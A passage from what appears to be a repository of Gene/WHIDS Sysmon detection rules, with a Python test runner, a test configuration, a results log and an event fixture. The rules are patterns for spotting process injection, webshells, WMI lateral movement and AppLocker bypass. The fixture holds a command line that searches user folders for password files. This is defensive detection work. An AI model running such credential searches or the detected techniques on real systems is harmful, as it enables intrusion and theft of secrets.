"$anc: Ancestors ~= '{{msoffice}}'", 78 | "$tools: Image ~= '({{execution}}|{{decode}})'" 79 | ], 80 | "Condition": "$tools and $anc" 81 | } 82 | 83 | { 84 | "Name": "HeurWebShell", 85 | 
"Tags": [ 86 | "Heuristics", 87 | "WHIDS", 88 | "WebShell" 89 | ], 90 | "Meta": { 91 | "Events": { 92 | "Microsoft-Windows-Sysmon/Operational": [ 93 | 1 94 | ] 95 | }, 96 | "Computers": [], 97 | "Criticality": 10, 98 | "Author": "@0xrawsec", 99 | "Comments": "Generic rule to catch webshells", 100 | "Schema": "2.0.0" 101 | }, 102 | "Matches": [ 103 | "$anc: Ancestors ~= '{{webservers}}'", 104 | "$tools: Image ~= '{{admintools}}'" 105 | ], 106 | "Condition": "$tools and $anc" 107 | } 108 | 109 | -------------------------------------------------------------------------------- /rules/whids/injection.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ExplorerInjection", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 10 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "0xrawsec", 15 | "Comments": "Attempt to write (inject) into Explorer process. Built up for Windows 10\u00a0might generate some FPs on earlier windows versions.", 16 | "ATTACK": [ 17 | { 18 | "ID": "T1055", 19 | "Tactic": "privilege-escalation", 20 | "Reference": "https://attack.mitre.org/techniques/T1055" 21 | } 22 | ], 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$ga: GrantedAccess &= '0x20'", 27 | "$srcwl: SourceImage ~= '(?i:C:\\\\Windows\\\\System32\\\\(csrss)\\.exe)'", 28 | "$hosted: SourceImage ~= '(?i:\\\\(lsass|svchost)\\.exe$)'", 29 | "$win10shared: SourceServices ~= '{{win10shared}}'", 30 | "$win10svcs: SourceServices ~= '{{win10svcs}}'", 31 | "$sysmon: SourceServices ~= '{{sysmon-svc}}'", 32 | "$expl: TargetImage ~= '(?i:C:\\\\Windows\\\\Explorer\\.exe)'", 33 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid" 34 | ], 35 | "Condition": "$ga and $expl and !($srcisparent or ($hosted and $win10shared) or $win10svcs or $sysmon or $srcwl)" 36 | } 37 | 38 | { 39 | "Name": "SuspWriteAccess", 40 | "Tags": [ 41 | "WHIDS" 42 | ], 43 | 
"Meta": { 44 | "Events": { 45 | "Microsoft-Windows-Sysmon/Operational": [ 46 | 10 47 | ] 48 | }, 49 | "Computers": [], 50 | "Criticality": 8, 51 | "Author": "0xrawsec", 52 | "Comments": "Experimental rule to catch generic process injection (write access to a foreign process without being its parent). Won't catch process hollowing since the parent injects into the child. NB:\u00a0works only in WHIDS", 53 | "ATTACK": [ 54 | { 55 | "ID": "T1055", 56 | "Tactic": "privilege-escalation", 57 | "Reference": "https://attack.mitre.org/techniques/T1055" 58 | } 59 | ], 60 | "Schema": "2.0.0" 61 | }, 62 | "Matches": [ 63 | "$ga: GrantedAccess &= '0x20'", 64 | "$wlsvcs: SourceServices ~= '(?i:({{sysmon-svc}}|Appinfo|PcaSvc|Themes))'", 65 | "$srcwl: SourceImage ~= '(?i:{{system}}(conhost|csrss|lsass)\\.exe)'", 66 | "$trgwl: TargetImage ~= '(?i:{{windows-apps}}(Microsoft\\.MicrosoftOfficeHub_.*?\\\\LocalBridge\\.exe))'", 67 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid", 68 | "$srcistarget: SourceImage = @TargetImage", 69 | "$srcissystem: SourceIntegrityLevel = 'System'" 70 | ], 71 | "Condition": "$ga and !($wlsvcs or $srcwl or $trgwl or $srcissystem or $srcisparent or $srcistarget)" 72 | } 73 | 74 | { 75 | "Name": "SuspPrivWriteAccess", 76 | "Tags": [ 77 | "WHIDS" 78 | ], 79 | "Meta": { 80 | "Events": { 81 | "Microsoft-Windows-Sysmon/Operational": [ 82 | 10 83 | ] 84 | }, 85 | "Computers": [], 86 | "Criticality": 8, 87 | "Author": "0xrawsec", 88 | "Comments": "Suspicious Write Access requested by privileged processes. 
Disabled because it seems there are too many cases (likely leading to easy bypass and possible FPs)", 89 | "ATTACK": [ 90 | { 91 | "ID": "T1055", 92 | "Tactic": "privilege-escalation", 93 | "Reference": "https://attack.mitre.org/techniques/T1055" 94 | } 95 | ], 96 | "Disable": true, 97 | "Schema": "2.0.0" 98 | }, 99 | "Matches": [ 100 | "$ga: GrantedAccess &= '0x20'", 101 | "$srcservices: SourceImage ~= '(?i:{{system}}services\\.exe)'", 102 | "$srcsrchidx: SourceImage ~= '(?i:{{system}}searchindexer\\.exe)'", 103 | "$srccomptel: SourceImage ~= '(?i:{{system}}CompatTelRunner\\.exe)'", 104 | "$srcsppsvc: SourceImage ~= '(?i:{{system}}sppsvc\\.exe)'", 105 | "$tgtsvchost: TargetImage ~= '(?i:{{system}}svchost\\.exe)'", 106 | "$tgtprothost: TargetImage ~= '(?i:{{system}}searchprotocolhost\\.exe)'", 107 | "$tgtcomptel: TargetImage ~= '(?i:{{system}}CompatTelRunner\\.exe)'", 108 | "$tgtsppext: TargetImage ~= '(?i:{{system}}SppExtComObj\\.exe)'", 109 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid", 110 | "$srcil: SourceIntegrityLevel ~= '(System|High)'", 111 | "$tgtil: TargetIntegrityLevel ~= '(System|High)'", 112 | "$srcwl: SourceImage ~= '(?i:{{system}}(lsass|csrss|conhost|consent)\\.exe)'", 113 | "$svcwl: SourceServices ~= '^(Schedule|Themes|Winmgmt|{{sysmon-svc}}|BrokerInfrastructure,DcomLaunch,Power,SystemEventsBroker)$'" 114 | ], 115 | "Condition": "$ga and ($srcil and $tgtil) and !($srcisparent or $srcwl or $svcwl or ($srcservices and $tgtsvchost) or ($srccomptel and $tgtcomptel) or ($srcsrchidx and $tgtprothost) or ($srcsppsvc and $tgtsppext))" 116 | } 117 | 118 | -------------------------------------------------------------------------------- /rules/whids/polymorphic.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HighlyPolymorphicCode", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 25 10 | ] 11 | }, 12 | "Computers": [], 13 | 
"Criticality": 10, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1093", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1093" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comments": "Experimental rule to catch polymorphic code", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$lowboundproc: ProcessIntegrity >= '50'" 27 | ], 28 | "Condition": "$lowboundproc" 29 | } 30 | 31 | { 32 | "Name": "MediumPolymorphicCode", 33 | "Tags": [ 34 | "WHIDS" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 25 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "ATTACK": [ 45 | { 46 | "ID": "T1093", 47 | "Tactic": "defense-evasion", 48 | "Reference": "https://attack.mitre.org/techniques/T1093" 49 | } 50 | ], 51 | "Author": "0xrawsec", 52 | "Comments": "Experimental rule to catch polymorphic code", 53 | "Schema": "2.0.0" 54 | }, 55 | "Matches": [ 56 | "$lowboundproc: ProcessIntegrity >= '15'", 57 | "$upboundproc: ProcessIntegrity < '50'" 58 | ], 59 | "Condition": "$lowboundproc and $upboundproc" 60 | } 61 | 62 | -------------------------------------------------------------------------------- /rules/whids/privesc.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ProcPrivEsc", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 10 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "Author": "0xrawsec", 15 | "Comments": "Write Access to a higher process integrity", 16 | "ATTACK": [], 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$ga: GrantedAccess &= '0x20'", 21 | "$srclow: SourceIntegrityLevel = 'Low'", 22 | "$srcmed: SourceIntegrityLevel = 'Medium'", 23 | "$srchigh: SourceIntegrityLevel = 'High'", 24 | "$tgtmed: TargetIntegrityLevel = 'Medium'", 25 | "$tgthigh: TargetIntegrityLevel = 'High'", 26 | "$tgtsys: TargetIntegrityLevel = 'System'" 27 | ], 28 | 
"Condition": "$ga and (($srclow and ($tgtmed or $tgthigh or $tgtsys)) or ($srcmed and ($tgthigh or $tgtsys)) or ($srchigh and $tgtsys))" 29 | } 30 | 31 | { 32 | "Name": "FilePrivEsc", 33 | "Tags": [ 34 | "WHIDS" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 11 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 10, 44 | "Author": "0xrawsec", 45 | "Comments": "File creation from a medium/low process integrity to sensitive directories.", 46 | "ATTACK": [], 47 | "Schema": "2.0.0" 48 | }, 49 | "Matches": [ 50 | "$wl: TargetFilename ~= '(?i:C:\\\\(Users|ProgramData)\\\\.*)'", 51 | "$il: IntegrityLevel ~= '(Low|Medium)'" 52 | ], 53 | "Condition": "$il and !$wl" 54 | } 55 | 56 | -------------------------------------------------------------------------------- /rules/whids/services.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "UntrustedService", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 7 10 | ] 11 | }, 12 | "Computers": [], 13 | "ATTACK": [ 14 | { 15 | "ID": "T1035", 16 | "Tactic": "Execution", 17 | "Reference": "https://attack.mitre.org/techniques/T1035/" 18 | } 19 | ], 20 | "Criticality": 10, 21 | "Disable": false, 22 | "Author": "0xrawsec", 23 | "Comments": "Rule to catch services with an untrusted signature.", 24 | "Requirements": "Hook enabled in Whids", 25 | "Schema": "2.0.0" 26 | }, 27 | "Matches": [ 28 | "$loaded: ImageLoaded ~= '(?i:\\.exe$)'", 29 | "$pservice: ParentImage ~= '(?i:{{system}}services\\.exe)'", 30 | "$trusted: Signature ~= '{{trusted-dll-sig}}'" 31 | ], 32 | "Condition": "$loaded and $pservice and !$trusted" 33 | } 34 | 35 | { 36 | "Name": "UnknownServices", 37 | "Tags": [ 38 | "WHIDS" 39 | ], 40 | "Meta": { 41 | "Events": { 42 | "Microsoft-Windows-Sysmon/Operational": [ 43 | 1 44 | ] 45 | }, 46 | "Computers": [], 47 | "Criticality": 10, 48 | "Disable": false, 49 | 
"Author": "0xrawsec", 50 | "Comments": "Rule to catch any non standard windows 10\u00a0services", 51 | "Requirements": "Hook enabled in Whids", 52 | "Schema": "2.0.0" 53 | }, 54 | "Matches": [ 55 | "$exist: Services ~= '.'", 56 | "$na: Services = 'N/A'", 57 | "$hosted: Image ~= '(?i:\\\\(lsass|svchost)\\.exe$)'", 58 | "$sysmon: Services = '{{sysmon-svc}}'", 59 | "$win10shared: Services ~= '{{win10shared}}'", 60 | "$win10svcs: Services ~= '{{win10svcs}}'" 61 | ], 62 | "Condition": "$exist and !($na or $sysmon or ($hosted and $win10shared) or $win10svcs)" 63 | } 64 | 65 | -------------------------------------------------------------------------------- /rules/whitelist.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NotWhitelisted", 3 | "Tags": [ 4 | "Whitelist" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1, 10 | 6, 11 | 7 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 8, 16 | "Author": "0xrawsec", 17 | "Comment": "Check if a hash is not in whitelist container", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$md5: extract('MD5=(?P[A-F0-9]{32})', Hashes) in whitelist", 22 | "$sha1: extract('SHA1=(?P[A-F0-9]{40})', Hashes) in whitelist", 23 | "$sha256: extract('SHA256=(?P[A-F0-9]{64})', Hashes) in whitelist" 24 | ], 25 | "Condition": "!($md5 and $sha1 and $sha256)" 26 | } 27 | 28 | -------------------------------------------------------------------------------- /rules/wmi.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "WMIPrvseCommand", 3 | "Tags": [ 4 | "WMI" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1047", 17 | "Tactic": "execution", 18 | "Reference": "https://attack.mitre.org/techniques/T1047" 19 | } 20 | ], 21 | "Author": "@0xrawsec", 22 | "Comment": 
"This rule catches the processes spawned using WMI.", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$wmi: ParentImage ~= '(?i:\\\\wmiprvse\\.exe$)'" 27 | ], 28 | "Condition": "$wmi" 29 | } 30 | 31 | { 32 | "Name": "SuspWMIC", 33 | "Tags": [ 34 | "WMI" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 1 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "Author": "@0xrawsec", 45 | "Comment": "WMIC suspicious command line", 46 | "Schema": "2.0.0" 47 | }, 48 | "Matches": [ 49 | "$wmic: Image ~= '(?i:\\\\wmic\\.exe$)'", 50 | "$proc: CommandLine ~= '(?i:process\\s+call\\s+create)'" 51 | ], 52 | "Condition": "$wmic and $proc" 53 | } 54 | 55 | { 56 | "Name": "LateralWMI", 57 | "Tags": [ 58 | "WMI", 59 | "Lateral" 60 | ], 61 | "Meta": { 62 | "Events": { 63 | "Microsoft-Windows-Sysmon/Operational": [ 64 | 1 65 | ] 66 | }, 67 | "Computers": [], 68 | "Criticality": 8, 69 | "Author": "@0xrawsec", 70 | "Comment": "This rule catches lateral movement done with WMI", 71 | "Schema": "2.0.0" 72 | }, 73 | "Matches": [ 74 | "$wmi: Image ~= '(?i:\\\\wmic\\.exe$)'", 75 | "$node: CommandLine ~= '(?i:/node:)'" 76 | ], 77 | "Condition": "$wmi and $node" 78 | } 79 | 80 | { 81 | "Name": "WMIApplockerBypassAttempt", 82 | "Tags": [ 83 | "WMI" 84 | ], 85 | "Meta": { 86 | "Events": { 87 | "Microsoft-Windows-Sysmon/Operational": [ 88 | 1 89 | ] 90 | }, 91 | "Computers": [], 92 | "Criticality": 8, 93 | "ATTACK": [ 94 | { 95 | "ID": "T1220", 96 | "Tactic": "execution", 97 | "Reference": "https://attack.mitre.org/techniques/T1220" 98 | } 99 | ], 100 | "Author": "@0xrawsec", 101 | "Comment": "WMI Applocker Bypass attempt", 102 | "Link": "https://subt0x11.blogspot.nl/2018/04/wmicexe-whitelisting-bypass-hacking.html?m=1", 103 | "Schema": "2.0.0" 104 | }, 105 | "Matches": [ 106 | "$wmi: Image ~= '(?i:\\\\wmic\\.exe$)'", 107 | "$format: CommandLine ~= '(?i:/format:.*\\.xsl)'" 108 | ], 109 | "Condition": "$wmi and $format" 110 | } 111 | 112 
| { 113 | "Name": "WMIEvents", 114 | "Tags": [ 115 | "WMI" 116 | ], 117 | "Meta": { 118 | "Events": { 119 | "Microsoft-Windows-Sysmon/Operational": [ 120 | 19, 121 | 20, 122 | 21 123 | ] 124 | }, 125 | "Computers": [], 126 | "Criticality": 10, 127 | "ATTACK": [ 128 | { 129 | "ID": "T1084", 130 | "Tactic": "persistence", 131 | "Reference": "https://attack.mitre.org/techniques/T1084" 132 | } 133 | ], 134 | "Author": "@0xrawsec", 135 | "Comment": "This rule catches any WMI events. Any of them needs to be checked.", 136 | "Schema": "2.0.0" 137 | }, 138 | "Matches": [], 139 | "Condition": "" 140 | } 141 | 142 | -------------------------------------------------------------------------------- /scripts/requirements.txt: -------------------------------------------------------------------------------- 1 | PyYAML>=3.11 2 | -------------------------------------------------------------------------------- /scripts/tester.conf.example: -------------------------------------------------------------------------------- 1 | params: 2 | # Gene binary location 3 | gene: /path/to/gene/binary 4 | # Gene rules location 5 | rules: /path/to/gene/rules 6 | # Root directory for the test files 7 | tests-root: /root/to/test/files 8 | 9 | # configure the test cases 10 | # key: is the rule name (as defined in gene rule) 11 | # value: is the test file relative to tests-root 12 | # files may be reused for several test cases 13 | tests: 14 | AutomatedRecursiveDir: AutomatedRecursiveDir.json 15 | BrowserChild: BrowserChild.json 16 | CertutilSuspDecode: CertutilSuspDecode.json 17 | DownloadPath: DownloadPath.json 18 | EmbeddedHTTPLinkInCL: EmbeddedHTTPLinkInCL.json 19 | EventClearing: EventClearing.json 20 | ExecDownloadedDocument: ExecDownloadedDocument.json 21 | ExecTimestomping: ExecTimestomping.json 22 | ExecutableADS: ExecutableADS.json 23 | ExecutableFileCreated: ExecutableFileCreated.json 24 | ExecutableUnkExt: ExecutableUnkExt.json 25 | ExplicitNetworkLogon: ExplicitNetworkLogon.json 26 | 
Heur7zExec: Heur7zExec.json 27 | HeurADSInCL: HeurADSInCL.json 28 | HeurCallShellcode: HeurCallShellcode.json 29 | HeurCLWithCreds: HeurCLWithCreds.json 30 | HeurDropper: HeurDropper.json 31 | HeuristicSamlibDll: HeuristicSamlibDll.json 32 | HeuristicVaultcliDll: HeuristicVaultcliDll.json 33 | HeurPersistentRAT: HeurPersistentRAT.json 34 | HeurRAT: HeurRAT.json 35 | HeurRemotePayload: HeurRemotePayload.json 36 | HeurSpawnShell: HeurSpawnShell.json 37 | HeurZipExec: HeurZipExec.json 38 | HiddenPsExec: HiddenPsExec.json 39 | InfoRemotePath: InfoRemotePath.json 40 | InfoSuspiciousParent: InfoSuspiciousParent.json 41 | LargeBase64: LargeBase64.json 42 | LargeCL512: LargeCL512.json 43 | LargeCL999: LargeCL999.json 44 | LateralWMI: LateralWMI.json 45 | LogonFromExternal: LogonFromExternal.json 46 | MaliciousLsassAccess: MaliciousLsassAccess.json 47 | MaliciousSvchostAccess: MaliciousSvchostAccess.json 48 | MSOfficeThreat: MSOfficeThreat.json 49 | Nbtstat.exe: Nbtstat.exe.json 50 | Net.exe: Net.exe.json 51 | NewADS: NewADS.json 52 | NewAutorun: NewAutorun.json 53 | NewExeCreatedInRoot: NewExeCreatedInRoot.json 54 | NewRemoteScheduledTask: NewRemoteScheduledTask.json 55 | NewSchedTaskInReg: NewSchedTaskInReg.json 56 | NewSchedTaskOnDisk: NewSchedTaskOnDisk.json 57 | OfficeDropperExec: OfficeDropperExec.json 58 | OfficeDropper: OfficeDropper.json 59 | PowershellExecEnc: PowershellExecEnc.json 60 | PowershellLargeCL: PowershellLargeCL.json 61 | PowershellSamlibDll: PowershellSamlibDll.json 62 | PowershellStdin: PowershellStdin.json 63 | PsExec4624: PsExec4624.json 64 | PsExecCommand: PsExecCommand.json 65 | PsExec: PsExec.json 66 | Regsvr32ApplockerBypass: Regsvr32ApplockerBypass.json 67 | SecurityLogClearing: SecurityLogClearing.json 68 | ServiceDeletion: ServiceDeletion.json 69 | StopSvchostAccess: StopSvchostAccess.json 70 | SuspiciousADS: SuspiciousADS.json 71 | SuspiciousLsassAccess: SuspiciousLsassAccess.json 72 | SuspiciousRundll32: SuspiciousRundll32.json 73 | 
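#!/usr/bin/env python
"""Run the Gene rule test cases listed in a YAML configuration file.

The configuration (see scripts/tester.conf.example) has two sections:
``params`` with the paths to the Gene binary, the rules directory and the
root of the test event files, and ``tests`` mapping a rule name to the
event file (relative to ``tests-root``) that must trigger it.  Gene is
invoked once per entry with its ``-test`` option and the run stops at the
first failing rule.
"""

import os
import sys
import yaml
import argparse
import subprocess
from datetime import datetime


def load_config(path):
    """Parse the tester configuration at ``path`` and return it as a dict.

    ``yaml.safe_load`` replaces ``yaml.load(..., Loader=yaml.FullLoader)``:
    the configuration only holds plain mappings and string scalars, so the
    safe loader is sufficient and never instantiates arbitrary Python
    objects; it is also available on every PyYAML release allowed by
    scripts/requirements.txt (``PyYAML>=3.11``), whereas ``FullLoader`` is
    not present in the oldest of those releases and would raise
    AttributeError there.
    """
    with open(path) as fd:
        return yaml.safe_load(fd)


def has_test_option(gene_path):
    """Return True when the Gene binary at ``gene_path`` advertises ``-test``.

    Gene writes its usage to stderr when called with ``-h``; the option is
    detected by the literal ``-test`` line in that output.  An OSError
    (e.g. FileNotFoundError) propagates if the binary cannot be executed.
    """
    cp = subprocess.run([gene_path, "-h"], capture_output=True, text=True)
    return "-test\n" in cp.stderr


def _run_rule_test(gene_path, rules_path, tests_root, rule_name, test_file):
    """Run Gene in test mode for one rule and return (CompletedProcess, seconds).

    Raises FileNotFoundError when ``test_file`` does not exist under
    ``tests_root``, so a typo in the configuration is reported before Gene
    is invoked rather than as a Gene error.
    """
    fp_test_file = os.path.join(tests_root, test_file)
    if not os.path.isfile(fp_test_file):
        raise FileNotFoundError(fp_test_file)

    cmd = [gene_path, "-test", "-r", rules_path, "-n", rule_name, "-j", fp_test_file]
    start = datetime.now()
    cp = subprocess.run(cmd, capture_output=True, text=True)
    elapsed = (datetime.now() - start).total_seconds()
    return cp, elapsed


def test(config):
    """Run every test case in ``config`` and exit non-zero on the first failure.

    ``config`` is the dict returned by :func:`load_config`.  One
    ``Testing <rule> : SUCCESS (time=<s>s)`` line per passing rule goes to
    stdout (tests.md in this repository holds output of that shape); on a
    failure Gene's stderr/stdout are printed and the script exits with
    Gene's return code.  Exits with status 1 when the binary lacks ``-test``.
    """
    gene_path = config["params"]["gene"]
    rules_path = config["params"]["rules"]
    tests_root = config["params"]["tests-root"]

    if not has_test_option(gene_path):
        # The original message carried a "{}" placeholder but never
        # formatted the path in; diagnostics go to stderr so they do not
        # mix with the per-rule result lines.
        print("Gene binary {} does not have -test option, upgrade it".format(gene_path),
              file=sys.stderr)
        sys.exit(1)

    for rule_name, test_file in config["tests"].items():
        cp, elapsed = _run_rule_test(gene_path, rules_path, tests_root, rule_name, test_file)
        if cp.returncode == 0:
            print("Testing {} : SUCCESS (time={}s)".format(rule_name, elapsed))
        else:
            print("Stderr:")
            print(cp.stderr)
            print("Stdout:")
            print(cp.stdout)
            print("Test rule {} : FAILED".format(rule_name))
            sys.exit(cp.returncode)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Run Gene rule test cases")
    parser.add_argument("config", help="Tests configuration file")
    args = parser.parse_args()

    test(load_config(args.config))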
HeuristicSamlibDll : SUCCESS (time=0.022972s) 38 | 39 | Testing HeuristicVaultcliDll : SUCCESS (time=0.021837s) 40 | 41 | Testing HeurPersistentRAT : SUCCESS (time=0.023436s) 42 | 43 | Testing HeurRAT : SUCCESS (time=0.021516s) 44 | 45 | Testing HeurRemotePayload : SUCCESS (time=0.023249s) 46 | 47 | Testing HeurSpawnShell : SUCCESS (time=0.023095s) 48 | 49 | Testing HeurZipExec : SUCCESS (time=0.021555s) 50 | 51 | Testing HiddenPsExec : SUCCESS (time=0.023188s) 52 | 53 | Testing LargeBase64 : SUCCESS (time=0.047693s) 54 | 55 | Testing LargeCL512 : SUCCESS (time=0.023542s) 56 | 57 | Testing LargeCL999 : SUCCESS (time=0.090004s) 58 | 59 | Testing LateralWMI : SUCCESS (time=0.0238s) 60 | 61 | Testing LogonFromExternal : SUCCESS (time=0.025126s) 62 | 63 | Testing MaliciousLsassAccess : SUCCESS (time=0.02069s) 64 | 65 | Testing MaliciousSvchostAccess : SUCCESS (time=0.022057s) 66 | 67 | Testing MSOfficeThreat : SUCCESS (time=0.025088s) 68 | 69 | Testing Nbtstat.exe : SUCCESS (time=0.022553s) 70 | 71 | Testing Net.exe : SUCCESS (time=0.022635s) 72 | 73 | Testing NewADS : SUCCESS (time=0.022627s) 74 | 75 | Testing NewAutorun : SUCCESS (time=0.022788s) 76 | 77 | Testing NewExeCreatedInRoot : SUCCESS (time=0.022224s) 78 | 79 | Testing NewRemoteScheduledTask : SUCCESS (time=0.023317s) 80 | 81 | Testing NewSchedTaskInReg : SUCCESS (time=0.023302s) 82 | 83 | Testing NewSchedTaskOnDisk : SUCCESS (time=0.02184s) 84 | 85 | Testing OfficeDropperExec : SUCCESS (time=0.0242s) 86 | 87 | Testing OfficeDropper : SUCCESS (time=0.021458s) 88 | 89 | Testing PowershellExecEnc : SUCCESS (time=0.023201s) 90 | 91 | Testing PowershellLargeCL : SUCCESS (time=0.040721s) 92 | 93 | Testing PowershellSamlibDll : SUCCESS (time=0.021212s) 94 | 95 | Testing PowershellStdin : SUCCESS (time=0.021048s) 96 | 97 | Testing PsExec4624 : SUCCESS (time=0.022262s) 98 | 99 | Testing PsExecCommand : SUCCESS (time=0.021541s) 100 | 101 | Testing PsExec : SUCCESS (time=0.021116s) 102 | 103 | Testing 
Regsvr32ApplockerBypass : SUCCESS (time=0.024256s) 104 | 105 | Testing SecurityLogClearing : SUCCESS (time=0.02134s) 106 | 107 | Testing ServiceDeletion : SUCCESS (time=0.022081s) 108 | 109 | Testing StopSvchostAccess : SUCCESS (time=0.02157s) 110 | 111 | Testing SuspiciousADS : SUCCESS (time=0.022787s) 112 | 113 | Testing SuspiciousLsassAccess : SUCCESS (time=0.024622s) 114 | 115 | Testing SuspiciousRundll32 : SUCCESS (time=0.02133s) 116 | 117 | Testing SuspiciousServiceCreated : SUCCESS (time=0.023298s) 118 | 119 | Testing SuspiciousService : SUCCESS (time=0.023949s) 120 | 121 | Testing SvcHostUnsignedDll : SUCCESS (time=0.023206s) 122 | 123 | Testing SvcHostUntrustedDLL : SUCCESS (time=0.023652s) 124 | 125 | Testing SysmonConfigChanged : SUCCESS (time=0.020811s) 126 | 127 | Testing SysmonFingerprinting : SUCCESS (time=0.020348s) 128 | 129 | Testing SysmonStateChanged : SUCCESS (time=0.021455s) 130 | 131 | Testing SystemInfo.exe : SUCCESS (time=0.023406s) 132 | 133 | Testing Tasklist.exe : SUCCESS (time=0.022158s) 134 | 135 | Testing UnkPrivDstPort : SUCCESS (time=0.021605s) 136 | 137 | Testing UntrustedDriverLoaded : SUCCESS (time=0.022744s) 138 | 139 | Testing UserTempExec : SUCCESS (time=0.022134s) 140 | 141 | Testing WindowsTempExec : SUCCESS (time=0.021277s) 142 | 143 | Testing WMIPrvseCommand : SUCCESS (time=0.022656s) 144 | 145 | Testing WMIEvents : SUCCESS (time=0.023587s) 146 | 147 | Testing Xcopy.exe : SUCCESS (time=0.022713s) 148 | 149 | Testing SuspWriteAccess : SUCCESS (time=0.021416s) 150 | 151 | Testing HighlyPolymorphicCode : SUCCESS (time=0.02334s) 152 | 153 | Testing MediumPolymorphicCode : SUCCESS (time=0.023213s) 154 | 155 | Testing HeurMaliciousAccess : SUCCESS (time=0.023135s) 156 | 157 | Testing UntrustedService : SUCCESS (time=0.021205s) 158 | 159 | Testing PSC#Win32API : SUCCESS (time=0.033039s) 160 | 161 | Testing HeurOfficeThreat : SUCCESS (time=0.025899s) 162 | 163 | Testing HeurWebShell : SUCCESS (time=0.035747s) 164 | 165 | Testing 
ExplorerInjection : SUCCESS (time=0.023452s) 166 | 167 | Testing FilePrivEsc : SUCCESS (time=0.023911s) 168 | 169 | Testing ProcPrivEsc : SUCCESS (time=0.025231s) 170 | 171 | Testing SuspWMIC : SUCCESS (time=0.022872s) 172 | 173 | Testing HeurSuspFileWrite : SUCCESS (time=0.040106s) 174 | 175 | Testing HeuristicPrivEsc : SUCCESS (time=0.022838s) 176 | 177 | Testing HeuristicSuspiciousAccess : SUCCESS (time=0.022106s) 178 | 179 | -------------------------------------------------------------------------------- /tests/AutomatedRecursiveDir.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"cmd\" /c dir \"C:\\Users\\*password*\" /b /s /a-d", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Windows Command Processor", 8 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 9 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 10 | "Image": "C:\\Windows\\System32\\cmd.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\commander.exe -f", 15 | "ParentImage": "C:\\commander.exe", 16 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 17 | "ParentProcessId": "920", 18 | "ProcessGuid": "{49F1AF32-38CB-5AC7-0000-00104F090D00}", 19 | "ProcessId": "956", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "898286", 31 | "Execution": { 32 | "ProcessID": 
